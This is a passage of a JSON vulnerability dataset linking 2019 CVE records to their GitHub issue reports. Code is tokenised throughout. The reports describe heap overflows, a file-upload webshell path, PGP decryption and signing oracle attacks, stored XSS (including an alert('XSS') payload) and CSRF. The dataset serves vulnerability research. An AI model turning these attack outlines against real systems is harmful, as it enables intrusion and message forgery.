  33912. "description": "heap buffer overflow in APITAG of coders/tiff.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa]fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  33913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  33914. "severity": "HIGH",
  33915. "baseScore": 8.1,
  33916. "impactScore": 5.2,
  33917. "exploitabilityScore": 2.8
  33918. },
  33919. {
  33920. "CVE_ID": "CVE-2019-10652",
  33921. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/38",
  33922. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/38",
  33923. "Repo_new": "flatcore/flatcore-cms",
  33924. "Issue_Created_At": "2019-03-29T02:49:24Z",
  33925. "description": "There is an arbitrary file upload vulnerability. There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web example: FILETAG FILETAG I think you should limit the type of file you upload",
  33926. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  33927. "severity": "HIGH",
  33928. "baseScore": 7.2,
  33929. "impactScore": 5.9,
  33930. "exploitabilityScore": 1.2
  33931. },
  33932. {
  33933. "CVE_ID": "CVE-2019-10654",
  33934. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/108",
  33935. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/108",
  33936. "Repo_new": "ckolivas/lrzip",
  33937. "Issue_Created_At": "2019-03-21T13:20:51Z",
  33938. "description": "invalid memory read in lzo1x_decompress, which is different from CVETAG . On lrzip NUMBERTAG there is an invalid memory read in lzo1x_decompress, which is different from CVETAG . POC is here: FILETAG ERRORTAG",
  33939. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33940. "severity": "MEDIUM",
  33941. "baseScore": 5.5,
  33942. "impactScore": 3.6,
  33943. "exploitabilityScore": 1.8
  33944. },
  33945. {
  33946. "CVE_ID": "CVE-2019-10686",
  33947. "Issue_Url_old": "https://github.com/ctripcorp/apollo/issues/2103",
  33948. "Issue_Url_new": "https://github.com/apolloconfig/apollo/issues/2103",
  33949. "Repo_new": "apolloconfig/apollo",
  33950. "Issue_Created_At": "2019-04-01T09:55:54Z",
  33951. "description": "PATHTAG \u95ee\u9898\u8bf4\u660e PATHTAG \u6e90\u7801 CODETAG NUMBERTAG poc APITAG APITAG NUMBERTAG APITAG APITAG APITAG",
  33952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  33953. "severity": "CRITICAL",
  33954. "baseScore": 10.0,
  33955. "impactScore": 6.0,
  33956. "exploitabilityScore": 3.9
  33957. },
  33958. {
  33959. "CVE_ID": "CVE-2019-10714",
  33960. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1495",
  33961. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1495",
  33962. "Repo_new": "imagemagick/imagemagick",
  33963. "Issue_Created_At": "2019-03-04T14:35:44Z",
  33964. "description": "Out of boundary in function APITAG of APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG The parameter c missing check in function APITAG which may lead to out of boundary vulnerability. Steps to Reproduce URLTAG APITAG In the gdb: ERRORTAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: dk from Chaitin Tech",
  33965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33966. "severity": "MEDIUM",
  33967. "baseScore": 6.5,
  33968. "impactScore": 3.6,
  33969. "exploitabilityScore": 2.8
  33970. },
  33971. {
  33972. "CVE_ID": "CVE-2019-10740",
  33973. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6638",
  33974. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6638",
  33975. "Repo_new": "roundcube/roundcubemail",
  33976. "Issue_Created_At": "2019-02-22T10:49:17Z",
  33977. "description": "Decryption Oracle based on replying to PGP encrypted emails. In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in APITAG An attacker who is in possession of PGP encrypted messages can embed them into a multipart message and re send them to the intended receiver. When the message is read and decrypted by the receiver, the attacker's content is shown. If the victim replies, the plaintext is leaked to an attacker's email address. The root cause for these vulnerabilities lies in the way Roundcube (and many other mail clients) handle partially encrypted multipart messages. Leaking plaintext through replies Attacker model : Attacker is in possession of PGP encrypted messages, which she may have obtained as passive man in the middle or by actively hacking into the victim's mail server or gateway Attacker's goal : Leak the plaintext by wrapping the ciphertext part within a benign looking MIME mail sent to and decrypted+replied to by the victim Attack outline: If Roundcube receives a multipart email, as depicted below, it decrypt the ciphertext part(s), together with the attacker controlled text (which may be prepended and/or appended). APITAG A benign looking attacker's text may lure the victim into replying. Because the decrypted part is also quoted in the reply, the user unintentionally acts as a decryption oracle. To obfuscate the existence of the encrypted part(s), the attacker may add a lot of newlines or hide it within a long conversation history. A user replying to such a \u2018mixed content\u2019 conversation thereby leaks the plaintext of encrypted messages wrapped within attacker controlled text. Countermeasures Do not decrypt emails unless the PGP encrypted part is the root node and therefore the only part in the MIME tree.",
  33978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  33979. "severity": "MEDIUM",
  33980. "baseScore": 4.3,
  33981. "impactScore": 1.4,
  33982. "exploitabilityScore": 2.8
  33983. },
  33984. {
  33985. "CVE_ID": "CVE-2019-10741",
  33986. "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3925",
  33987. "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3925",
  33988. "Repo_new": "thundernest/k-9",
  33989. "Issue_Created_At": "2019-02-23T16:49:30Z",
  33990. "description": "Signing Oracle based on keeping CSS styles in replies to HTML emails. Dear K NUMBERTAG Mail team, In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in K NUMBERTAG Mail when used in combination with PGP APITAG ): K NUMBERTAG Mail quotes and includes CSS internal APITAG elements in email replies. This allows an attacker to abuse K NUMBERTAG Mail as a signing oracle for arbitrary PGP signed emails. The attack is outlined as follows: Attack scenario Digital signatures should guarantee integrity, authenticity, and non repudiation of messages. To give an example, Johnny could be a commander in chief who takes information security seriously. All his emails are digitally signed, making it hard to impersonate him in order to send forged statements or instructions. The goal of our attacker Eve is to start false flag warfare. Therefore she needs to obtain a digitally signed \"declaration of war\" which she can forward to the armed forces. General idea Eve now sends an email to commander Johnny, in which she hides her malicious content using CSS while a benign text message, such as APITAG up Johnny?\", is added to be shown by K NUMBERTAG Mail. Similarly, the benign text can be hidden while showing the malicious content, based on CSS conditional rules which are satisfied only for a third party. If Johnny replies to such a specially crafted HTML/CSS email, he signs arbitrary covert content along with visible content. This signed message can then be forwarded by Eve to a third party (e.g., the armed forces) where it displays the previously hidden malicious content \"I hereby declare war\". A simple example email is given below: CODETAG In this example, different content is shown based on the device's screen resolution. It can be used to obtain a signed email from a mobile device, where a benign message is shown. The reply message instead displays a (signed) declaration of war when shown on a desktop mail client. Conditional CSS rules The W3C specifies CSS conditional rules (e.g., APITAG ) which allow different formatting based on conditions such as screen width or orientation. For example, a different text can be shown whether a mobile phone is hold in portrait or landscape mode or whether the document is displayed on a screen or printed out. But there are lots of other options: for example, mail clients can be fingerprinted based on the APITAG conditional rule or various proprietary conditional statements of certain clients can be applied. Without going into detail here, in the scope of our research we found conditional CSS to show/hide certain text for virtually every email client that exists. CSS blinding options We identified seven CSS properties which can be used for covert content attacks as shown below. However, this list is unlikely to be complete because CSS is very complex and offers more possibilities to hide text. CODETAG Impact The attack allows Eve to obtain valid signatures for arbitrary content to be displayed. This can be used to trick a third party, which relies on the authenticity and integrity of signed messages, to perform certain actions (such as starting a war). A forensic analysis can reveal the deception, but then it may already be too late (the war is already declared). Countermeasures There are three options to counter the attack, each with a usability security trade off NUMBERTAG Drop CSS support in general : Conditional CSS makes it easy for an attacker to hide certain text within a signed message while showing different text. Ideally, clients would ignore CSS in received emails. However, this is an unrealistic scenario given today's usage of email. Sanitizing conditional CSS rules and properties which can be used to hide content is feasible, but it may be insufficient as web technologies are constantly evolving NUMBERTAG Only ASCII text in replies : It should not harm the user experience if mail clients converted quoted messages into ASCII text when replying to an email. Various clients are already doing this. Thus, we recommend that security focused clients should adopt this behavior NUMBERTAG Remove CSS styles in replies : Email clients should not sign any quoted CSS APITAG (or APITAG ) from the original message, so that they cannot be used as signing oracles, based on blinding text with CSS conditional statements. Greetings, Jens",
  33991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  33992. "severity": "MEDIUM",
  33993. "baseScore": 4.3,
  33994. "impactScore": 1.4,
  33995. "exploitabilityScore": 2.8
  33996. },
  33997. {
  33998. "CVE_ID": "CVE-2019-10773",
  33999. "Issue_Url_old": "https://github.com/yarnpkg/yarn/issues/7761",
  34000. "Issue_Url_new": "https://github.com/yarnpkg/yarn/issues/7761",
  34001. "Repo_new": "yarnpkg/yarn",
  34002. "Issue_Created_At": "2019-12-12T08:13:35Z",
  34003. "description": "globally installed package overwrites an existing binary in the target install location. APITAG npm has announced vulnerabilities that npm has been fixed. URLTAG One of the vulnerabilities has been fixed at yarn NUMBERTAG Thank you! \ud83d\udc4f\ud83d\udc4f\ud83d\udc4f But yarn hasn't fixed the other yet. Do you have any plans to fix this? Do you want to request a feature or report a bug ? APITAG bug? What is the current behavior? globally installed package overwrites an existing binary in the target install location. If the current behavior is a bug, please provide the steps to reproduce. APITAG create a symlink named create react app into a directory that yarn uses for globally install. APITAG The symlink has been overwritten What is the expected behavior? Do not overwrite the symlink. Please mention your FILETAG , yarn and operating system version. Node: APITAG Yarn NUMBERTAG OS: APITAG NUMBERTAG",
  34004. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34005. "severity": "HIGH",
  34006. "baseScore": 7.8,
  34007. "impactScore": 5.9,
  34008. "exploitabilityScore": 1.8
  34009. },
  34010. {
  34011. "CVE_ID": "CVE-2019-10842",
  34012. "Issue_Url_old": "https://github.com/twbs/bootstrap-sass/issues/1195",
  34013. "Issue_Url_new": "https://github.com/twbs/bootstrap-sass/issues/1195",
  34014. "Repo_new": "twbs/bootstrap-sass",
  34015. "Issue_Created_At": "2019-03-26T22:59:52Z",
  34016. "description": "NUMBERTAG Hi there, We noticed that NUMBERTAG was yanked, and NUMBERTAG was published to APITAG We thought this might be because of ruby sass being deprecated URLTAG , but we can't seem to see the NUMBERTAG code on APITAG Looking further, there's APITAG looking code in what i installed via APITAG : ERRORTAG I have not run this, and I'm a little concerned with what's going on here. Please advise.",
  34017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34018. "severity": "CRITICAL",
  34019. "baseScore": 9.8,
  34020. "impactScore": 5.9,
  34021. "exploitabilityScore": 3.9
  34022. },
  34023. {
  34024. "CVE_ID": "CVE-2019-10844",
  34025. "Issue_Url_old": "https://github.com/sony/nnabla/issues/209",
  34026. "Issue_Url_new": "https://github.com/sony/nnabla/issues/209",
  34027. "Repo_new": "sony/nnabla",
  34028. "Issue_Created_At": "2018-07-16T07:19:30Z",
  34029. "description": "Reliance on Untrusted Inputs in a Security Decision. Team, File: PATHTAG CODETAG Environment variables are untrustable input if they can be set by an attacker. They can have any content and length, and the same variable can be set more than once such as ( CVETAG , CVETAG ).",
  34030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34031. "severity": "CRITICAL",
  34032. "baseScore": 9.8,
  34033. "impactScore": 5.9,
  34034. "exploitabilityScore": 3.9
  34035. },
  34036. {
  34037. "CVE_ID": "CVE-2019-10877",
  34038. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2071",
  34039. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2071",
  34040. "Repo_new": "teeworlds/teeworlds",
  34041. "Issue_Created_At": "2019-03-22T16:11:41Z",
  34042. "description": "Integer overflow and null pointer dereference in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow in APITAG which can lead to a buffer overflow. ERRORTAG APITAG and APITAG can be arbitrary integers and there is no check for an integer overflow when multiplying these integers with each other and with APITAG . Also there is no check if mem_alloc returns NULL which can lead to a null pointer dereference. Regards, Mans van Someren FILETAG",
  34043. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34044. "severity": "CRITICAL",
  34045. "baseScore": 9.8,
  34046. "impactScore": 5.9,
  34047. "exploitabilityScore": 3.9
  34048. },
  34049. {
  34050. "CVE_ID": "CVE-2019-10878",
  34051. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2073",
  34052. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2073",
  34053. "Repo_new": "teeworlds/teeworlds",
  34054. "Issue_Created_At": "2019-03-22T16:24:33Z",
  34055. "description": "Failed bounds check in APITAG and APITAG and related functions in PATHTAG leading to arbitrary free and OOB pointer write.. Hello Teeworlds dev team, There is a failed bounds check in APITAG and APITAG and related functions which can lead to an arbitrary free and OOB pointer write and possibly leading to RCE. ERRORTAG These functions get called with the integer Index being an arbitrary value thus leading to an arbitrary write of a pointer at the line APITAG and an arbirary free at the line ERRORTAG (which should probably also have a stricter bounds check). ERRORTAG Regards, Mans van Someren FILETAG",
  34056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34057. "severity": "CRITICAL",
  34058. "baseScore": 9.8,
  34059. "impactScore": 5.9,
  34060. "exploitabilityScore": 3.9
  34061. },
  34062. {
  34063. "CVE_ID": "CVE-2019-10879",
  34064. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2070",
  34065. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2070",
  34066. "Repo_new": "teeworlds/teeworlds",
  34067. "Issue_Created_At": "2019-03-22T16:05:44Z",
  34068. "description": "Integer overflow(s) in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow bug in APITAG which can lead to a buffer overflow and possibly RCE. The integer overflow(s) occurs when calculating the Size and APITAG ERRORTAG As you can see there is no check to see if Size or APITAG overflow. The integer overflow of APITAG can lead to APITAG being smaller than Size. APITAG then gets used to allocate memory for the APITAG object and Size gets used to read data to this object leading to a buffer overflow. ERRORTAG Regards, Mans van Someren FILETAG",
  34069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34070. "severity": "CRITICAL",
  34071. "baseScore": 9.8,
  34072. "impactScore": 5.9,
  34073. "exploitabilityScore": 3.9
  34074. },
  34075. {
  34076. "CVE_ID": "CVE-2019-10888",
  34077. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/4",
  34078. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/4",
  34079. "Repo_new": "yxcmf/ukcms",
  34080. "Issue_Created_At": "2019-04-02T03:23:50Z",
  34081. "description": "PATHTAG CSRF NUMBERTAG before FILETAG click dirty button FILETAG adding user FILETAG add succeed FILETAG EXP: CODETAG",
  34082. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34083. "severity": "HIGH",
  34084. "baseScore": 8.8,
  34085. "impactScore": 5.9,
  34086. "exploitabilityScore": 2.8
  34087. },
  34088. {
  34089. "CVE_ID": "CVE-2019-10904",
  34090. "Issue_Url_old": "https://github.com/python/bugs.python.org/issues/34",
  34091. "Issue_Url_new": "https://github.com/python/bugs.python.org/issues/34",
  34092. "Repo_new": "python/bugs.python.org",
  34093. "Issue_Created_At": "2019-03-21T15:31:57Z",
  34094. "description": "XSS on ERRORTAG page of APITAG There's an XSS on the error page of APITAG CVETAG APITAG sure if this is the right place to report it, I already reported it to the python bugtracker itself despite it having no proper category for it CVETAG )",
  34095. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34096. "severity": "MEDIUM",
  34097. "baseScore": 6.1,
  34098. "impactScore": 2.7,
  34099. "exploitabilityScore": 2.8
  34100. },
  34101. {
  34102. "CVE_ID": "CVE-2019-10905",
  34103. "Issue_Url_old": "https://github.com/erusev/parsedown/issues/699",
  34104. "Issue_Url_new": "https://github.com/erusev/parsedown/issues/699",
  34105. "Repo_new": "erusev/parsedown",
  34106. "Issue_Created_At": "2019-03-17T16:16:17Z",
  34107. "description": "Injecting classnames into code blocks. In safe mode with html markup disabled, it is possible to insert any classname into a code block like this: > \\ APITAG renders as: APITAG infostring needs some cleanup here: URLTAG",
  34108. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34109. "severity": "HIGH",
  34110. "baseScore": 8.1,
  34111. "impactScore": 5.9,
  34112. "exploitabilityScore": 2.2
  34113. },
  34114. {
  34115. "CVE_ID": "CVE-2019-10914",
  34116. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/26",
  34117. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/26",
  34118. "Repo_new": "matrixssl/matrixssl",
  34119. "Issue_Created_At": "2019-02-15T00:05:35Z",
  34120. "description": "URGENT: Stack buffer overflow verifying NUMBERTAG certificate. Hello, while auditing some code using the APITAG library (currently sold as the Inside Secure TLS Toolkit, previously also called GUARD TLS Toolkit), I happened to notice that a public NUMBERTAG certificate testcase for CVETAG caused a stack buffer overflow. I cleaned up the testcase a bit, to make a better demonstration. You can test it with the APITAG tool that comes with APITAG CODETAG I believe any client or server that validates certificates will be affected by this, and as APITAG is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult. The bug is that APITAG uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below\u00a0should solve it. ERRORTAG Testcase: FILETAG",
  34121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34122. "severity": "CRITICAL",
  34123. "baseScore": 9.8,
  34124. "impactScore": 5.9,
  34125. "exploitabilityScore": 3.9
  34126. },
  34127. {
  34128. "CVE_ID": "CVE-2019-11002",
  34129. "Issue_Url_old": "https://github.com/Dogfalo/materialize/issues/6286",
  34130. "Issue_Url_new": "https://github.com/dogfalo/materialize/issues/6286",
  34131. "Repo_new": "dogfalo/materialize",
  34132. "Issue_Created_At": "2019-02-08T16:46:36Z",
  34133. "description": "Security question: Use HTML by default for PATHTAG and expose an XSS. Expected Behavior Don't execute html/javascript by default for Toasts, Tooltips and Autocomplete Current Behavior By default when you add dynamics contents like Toast, Tooltips and autocomplete you inject inputs data as HTML. I think all people who use APITAG implement compontents like your examples. It's a bad practice and by default, your input data could be sanitize or use APITAG instead APITAG or APITAG = APITAG Possible Solution If you want allow HTML, why not but sanitize the html and don't allow javascript. If the end user want allow HTML and javascript add a new configuration with a parameter like options : { APITAG true } Steps to Reproduce (for bugs) Toast APITAG Tooltips APITAG Autocomplete CODETAG Context I'm agree about the developper need control his data before inject it in a third party library but sametime we forget to do it. How i find this case NUMBERTAG APITAG Send javascript in a field NUMBERTAG APITAG Server fail and return message with javascript NUMBERTAG APITAG Reuse the message from the server and use the Toast NUMBERTAG I have a reflected XSS It's my fault, I didn't validate datas and I returned this script without sanitize. If by default your library don't allow html, I will not find this behavior. Your Environment Version used NUMBERTAG and NUMBERTAG",
  34134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34135. "severity": "MEDIUM",
  34136. "baseScore": 6.1,
  34137. "impactScore": 2.7,
  34138. "exploitabilityScore": 2.8
  34139. },
  34140. {
  34141. "CVE_ID": "CVE-2019-11018",
  34142. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/173",
  34143. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/173",
  34144. "Repo_new": "zoujingli/thinkadmin",
  34145. "Issue_Created_At": "2019-04-06T13:40:53Z",
  34146. "description": "APITAG NUMBERTAG authority APITAG Disclosure vulnerability. There is a authority APITAG Disclosure vulnerability APITAG NUMBERTAG As admin,if you change your password,your cookie won't become invalid. And it won't become invalid until the end of Life Cycle.So if attackers got admin's cookie,though traces of the attackers were found,and admin change his password,but attackers still can enter the managed system. POC: APITAG the attacker got admin's cookie. FILETAG NUMBERTAG We use Edit_this_cookie to change cookie . FILETAG APITAG change his own password FILETAG NUMBERTAG We can see attackers still have access to this manage system. FILETAG I have analysised source code that result in this vulnerabilty. The problem present to PATHTAG The original source code is: ERRORTAG And for this,I have make a padding. ERRORTAG Author:schur EMAILTAG",
  34147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34148. "severity": "CRITICAL",
  34149. "baseScore": 9.8,
  34150. "impactScore": 5.9,
  34151. "exploitabilityScore": 3.9
  34152. },
  34153. {
  34154. "CVE_ID": "CVE-2019-11024",
  34155. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/85",
  34156. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/85",
  34157. "Repo_new": "saitoha/libsixel",
  34158. "Issue_Created_At": "2019-03-29T05:47:49Z",
  34159. "description": "infinite recursive loop in load_pnm( ). Description : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack. Command : ./img2sixel APITAG w NUMBERTAG h NUMBERTAG q auto l force o out $POC POC : REPRODUCER URLTAG DEBUG : ~~~ Gdb: [ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers \u2500\u2500\u2500\u2500 $ra NUMBERTAG fffffffd NUMBERTAG f NUMBERTAG rb NUMBERTAG fffffffd2a NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG fffffffd NUMBERTAG rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rbp NUMBERTAG fffffffd2c NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd7f NUMBERTAG fffffffddb NUMBERTAG c NUMBERTAG APITAG push r NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 APITAG mov rax, QWORD PTR [rbp NUMBERTAG f0] $r NUMBERTAG r NUMBERTAG d0 $r NUMBERTAG b1 $r NUMBERTAG ffff6ef6ab0 \u2192 APITAG push rbp $r NUMBERTAG ffffffff9fc NUMBERTAG r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG eflags: [CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $cs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG dfcc NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG dfc NUMBERTAG fffffffcf NUMBERTAG dfb NUMBERTAG efb NUMBERTAG ffff NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG APITAG code NUMBERTAG ffff6c NUMBERTAG eac APITAG mov QWORD PTR [rbp NUMBERTAG ra NUMBERTAG ffff6c NUMBERTAG eb3 APITAG lea rax, [rb NUMBERTAG ffff6c NUMBERTAG eba APITAG mov QWORD PTR [rbp NUMBERTAG f0], ra NUMBERTAG ffff6c NUMBERTAG ec1 APITAG mov rax, QWORD PTR [rbp NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG ec8 APITAG mov rdx, ra NUMBERTAG ffff6c NUMBERTAG ecb APITAG shr rd NUMBERTAG ffff6c NUMBERTAG ecf APITAG add rd NUMBERTAG fff NUMBERTAG ffff6c NUMBERTAG ed6 APITAG movzx edx, BYTE PTR [rd NUMBERTAG ffff6c NUMBERTAG ed9 APITAG test dl, dl APITAG APITAG NUMBERTAG for (y NUMBERTAG y APITAG = end NUMBERTAG break NUMBERTAG p = pnm_get_line(p, end, tmp NUMBERTAG s = tmp; APITAG threads NUMBERTAG Id NUMBERTAG Name: \"img2sixel\", stopped, reason: SIGINT APITAG trace NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 load_pnm(p NUMBERTAG d NUMBERTAG a NUMBERTAG repeats NUMBERTAG times>, length NUMBERTAG allocator NUMBERTAG dfd0, result NUMBERTAG dfb8, ps NUMBERTAG dfc8, psy NUMBERTAG dfcc, ppalette NUMBERTAG pncolors NUMBERTAG dfd0, ppixelformat NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG b3 \u2192 APITAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , context NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG f \u2192 APITAG \"hang NUMBERTAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , finsecure NUMBERTAG cancel_flag NUMBERTAG ac0 APITAG , context NUMBERTAG f NUMBERTAG allocator NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG f5b \u2192 APITAG filename NUMBERTAG fffffffe2b1 \"hang NUMBERTAG ce \u2192 main(argc NUMBERTAG d, arg NUMBERTAG fffffffde NUMBERTAG",
  34160. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34161. "severity": "MEDIUM",
  34162. "baseScore": 5.5,
  34163. "impactScore": 3.6,
  34164. "exploitabilityScore": 1.8
  34165. },
  34166. {
  34167. "CVE_ID": "CVE-2019-11025",
  34168. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2581",
  34169. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2581",
  34170. "Repo_new": "cacti/cacti",
  34171. "Issue_Created_At": "2019-03-28T10:14:04Z",
  34172. "description": "Stored XSS in \"SNMP community string\" field . Describe the bug There's no escape being done before printing out the value of ERRORTAG (SNMP Options) in the View poller cache . To Reproduce Steps to reproduce the behavior NUMBERTAG Login as normal user ( should have device creation explicitly enabled NUMBERTAG Select create a new device from the console menu NUMBERTAG Enter the below shared payload into the \" ERRORTAG APITAG alert('XSS'); APITAG APITAG APITAG Admin CODETAG APITAG . ' ' . $item['snmp_community'] `",
  34173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  34174. "severity": "MEDIUM",
  34175. "baseScore": 5.4,
  34176. "impactScore": 2.7,
  34177. "exploitabilityScore": 2.3
  34178. },
  34179. {
  34180. "CVE_ID": "CVE-2019-11027",
  34181. "Issue_Url_old": "https://github.com/openid/ruby-openid/issues/122",
  34182. "Issue_Url_new": "https://github.com/openid/ruby-openid/issues/122",
